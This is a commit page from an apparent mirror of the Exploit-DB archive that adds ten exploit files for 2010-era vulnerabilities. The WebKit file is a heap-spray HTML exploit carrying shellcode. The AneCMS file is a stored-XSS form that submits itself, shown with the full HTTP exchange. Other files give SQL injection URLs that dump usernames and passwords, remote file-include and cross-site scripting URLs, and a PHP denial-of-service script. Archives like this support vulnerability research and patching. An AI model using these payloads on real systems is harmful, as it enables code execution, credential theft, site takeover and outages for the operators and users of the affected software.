bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_15_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-15 04:36:33 +00:00
parent 8c4a59c50c
commit f550d4ce66
11 changed files with 366 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -30398,3 +30398,13 @@ id,file,description,date,author,platform,type,port
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0
33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0
33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0
33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0
33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 'db_create.php' Cross Site Scripting Vulnerability",2010-03-12,Liscker,php,webapps,0
33755,platforms/php/dos/33755.php,"PHP <= 5.3.2 xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/33758.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38719/info
Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/manager/textbox.asp?id='

9
platforms/linux/remote/33752.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38689/info
WebKit is prone to a remote memory-corruption vulnerability; fixes are available.
Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
This issue was previously documented in BID 38671 (Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML>

14
platforms/php/dos/33755.php Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/38708/info
PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests.
Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library.
PHP 5.3.1 is vulnerable; other versions may also be affected.
<?php
$req = '<?xml version="1.0"?>
<methodCall>
</methodCall>';
$result = xmlrpc_decode_request( $req, $frop );
?>

273
platforms/php/webapps/33748.txt Executable file
View file

@ -0,0 +1,273 @@
source: http://www.securityfocus.com/bid/38657/info
AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
AneCMS 1.0 is vulnerable; other versions may also be affected.
=======================================================================
ANE CMS 1 Persistent XSS Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software ANE CMS 1
# Category CMS / Portals
# Plateform php
# Proof of concept #
Targeted URL: http://server/acp/index.php?p=cfg&m=links
In ADD LINKS Field provide the malicious script to store in the Database.
That is-
<html>
<body>
<form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">
<input type=hidden name="name" value=""><script>alert("XSS")</script>">
<input type=hidden name="link" value=""><script>alert("XSS")</script>">
<input type=hidden name="type" value="1">
<input type=hidden name="view" value="0">
</form>
<script>
document.XYZ.submit();
</script>
</body>
</html>
=======================================================================
Request -
=======================================================================
POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://server/acp/index.php?p=cfg&m=links
Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
name="><script>alert("XSS")</script>&link="><script>alert("XSS")</script>&type=1&view=0
=======================================================================
=======================================================================
Response-
=======================================================================
HTTP/1.1 200 OK
Date: Thu, 11 Mar 2010 06:59:03 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset: utf-8
Content-Length: 7771
&#65279;&#65279;<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Transdmin Light</title>
<!-- CSS -->
<link href="./skins/aaa/css/transdmin.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie6.css" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie7.css" /><![endif]-->
<!-- JavaScripts-->
<link rel="stylesheet" type="text/css" href="http://server/system/js/jquery.jgrowl.css" media="screen"/> <script type="text/javascript" src="http://server/system/js/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://server/system/js/jquery.jgrowl_minimized.js"></script>
<style>div.jGrowl div.green {
background-color: #00D400;
color: navy;
}</style>
</head>
<body>
<div id="wrapper">
<!-- h1 tag stays for the logo, you can use the a tag for linking the index page -->
<h1><a href="#"><span>Administration</span></a></h1>
<!-- You can name the links with lowercase, they will be transformed to uppercase by CSS, we prefered to name them with uppercase to have the same effect with disabled stylesheet -->
<ul id="mainNav">
<li><a href="index.php">Dashboard</a></li>
<li><a href="?p=cfg">Configuration</a></li>
<li><a href="?p=tpl">Design</a></li>
<li><a href="?p=mod">Modules</a></li>
<li class="logout"><a href="#">Logout Admin</a></li>
<li class="logout"><a href="../index.php">CMS</a></li>
</ul>
<!-- // #end mainNav -->
<div id="containerHolder">
<div id="container">
<div id="sidebar">
<ul class="sideNav">
<li><a href="?p=cfg">Show Setting</a></li>
<li><a href="?p=cfg&m=mod">Modify Setting</a></li>
<li><a href="?p=cfg&m=links">Links Management</a></li>
<li><a href="?p=cfg&m=reposerver">Repository Server</a></li>
</ul>
</div>
<h2><a href="#">Configuration</a> » <a href="#" class="active">Links</a></h2>
<div id="main"><br>
<form action="?p=cfg&m=links&id=0" class="jNice" method="POST">
<h3>Aggiungi un nuovo Link</h3>
<fieldset><p><label>Nome link:</label><input type="text" class="text-long" name="name" value=""/></p>
<p><label>Nome link:</label><input type="text" class="text-long" name="link" value=""/></p>
<p><label>Tipo Link:</label><input type="radio" name="type" value="1" checked>Barra Links <input type="radio" name="type" value="2">Menu Links</p>
<p><label>Accesso:</label>
<select name="view">
<option value="0">Visible only to guests</option>
<option value="1">Visible to all</option>
<option value="2">Visible only to members</option>
<option value="3">Visible only to admins</option>
</select>
</p>
<input type="submit" value="Send" />
</fieldset>
</form>
<table cellpadding="0" cellspacing="0">
<tr>
<td>Name</td>
<td>Link</td>
<td>Options</td>
</tr>
<tr><td colspan="4">Bar Links</td></tr>
<tr class="odd">
<td>Home</td>
<td>index.php</td>
<td><a href="?p=cfg&m=links&a=modify&id=1">Modify</a> <a href="?p=cfg&m=links&a=delete&id=1">Delete</a> <a href="?p=cfg&m=links&a=move&type=down&id=1">Move Down</a></td>
</tr>
<tr class="odd">
<td>Blog</td>
<td>blog</td>
<td><a href="?p=cfg&m=links&a=modify&id=2">Modify</a> <a href="?p=cfg&m=links&a=delete&id=2">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=2">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=2">Move Down</a></td>
</tr>
<tr class="odd">
<td>Registrati</td>
<td>register</td>
<td><a href="?p=cfg&m=links&a=modify&id=4">Modify</a> <a href="?p=cfg&m=links&a=delete&id=4">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=4">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=4">Move Down</a></td>
</tr>
<tr class="odd">
<td>ACP</td>
<td>acp</td>
<td><a href="?p=cfg&m=links&a=modify&id=5">Modify</a> <a href="?p=cfg&m=links&a=delete&id=5">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=5">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=5">Move Down</a></td>
</tr>
<tr class="odd">
<td>Widgets</td>
<td>index.php?modifywidgets</td>
<td><a href="?p=cfg&m=links&a=modify&id=6">Modify</a> <a href="?p=cfg&m=links&a=delete&id=6">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=6">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=6">Move Down</a></td>
</tr>
<tr class="odd">
<td>master</td>
<td>master.asp</td>
<td><a href="?p=cfg&m=links&a=modify&id=38">Modify</a> <a href="?p=cfg&m=links&a=delete&id=38">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=38">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=38">Move Down</a></td>
</tr>
<tr class="odd">
<td>"><script>alert("XSS")</script></td>
<td>"><script>alert("XSS")</script></td>
<td><a href="?p=cfg&m=links&a=modify&id=39">Modify</a> <a href="?p=cfg&m=links&a=delete&id=39">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=39">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=39">Move Down</a></td>
</tr>
<tr><td colspan="4">Menu Links</td></tr>
<tr class="odd">
<td>home</td>
<td>index.php</td>
<td><a href="?p=cfg&m=links&a=modify&id=14">Modify</a> <a href="?p=cfg&m=links&a=delete&id=14">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=14">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=14">Move Down</a></td>
</tr>
<tr class="odd">
<td>Blog</td>
<td>blog</td>
<td><a href="?p=cfg&m=links&a=modify&id=19">Modify</a> <a href="?p=cfg&m=links&a=delete&id=19">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=19">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=19">Move Down</a></td>
</tr>
</table>
<br />
</div>
<!-- // #main -->
<div class="clear"></div>
</div>
<!-- // #container -->
</div>
<!-- // #containerHolder -->
<p id="footer">Feel free to use and customize it. <a href="http://server">Credit is appreciated.</a></p>
</div>
<!-- // #wrapper -->
<script type="text/javascript">
$(function()
{
});</script>
</body>
</html>
=======================================================================
After completion Just Refres the page and the script get executed again and again.
#If you have any questions, comments, or concerns, feel free to contact me.

13
platforms/php/webapps/33749.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38658/info
ARTIS ABTON CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URIs are available:
http://www.example.com/rus/details/â??+benchmark(10000,md5(now()))+â??/
http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-â??1/
http://www.example.com/rus/â??+benchmark(10000,md5(now()))+â??/

10
platforms/php/webapps/33751.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38672/info
CodeIgniter is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
CodeIgniter 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?]

7
platforms/php/webapps/33753.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38697/info
Easynet4u Forum Host is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0

9
platforms/php/webapps/33754.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38707/info
phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyAdmin 3.3.0 is vulnerable; other versions may also be affected.
http://www.example.com/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=

7
platforms/php/webapps/33756.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38711/info
The 'com_seek' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

7
platforms/php/webapps/33757.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38714/info
The Joomla! 'com_d-greinar' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/DevilZ TM/)</script>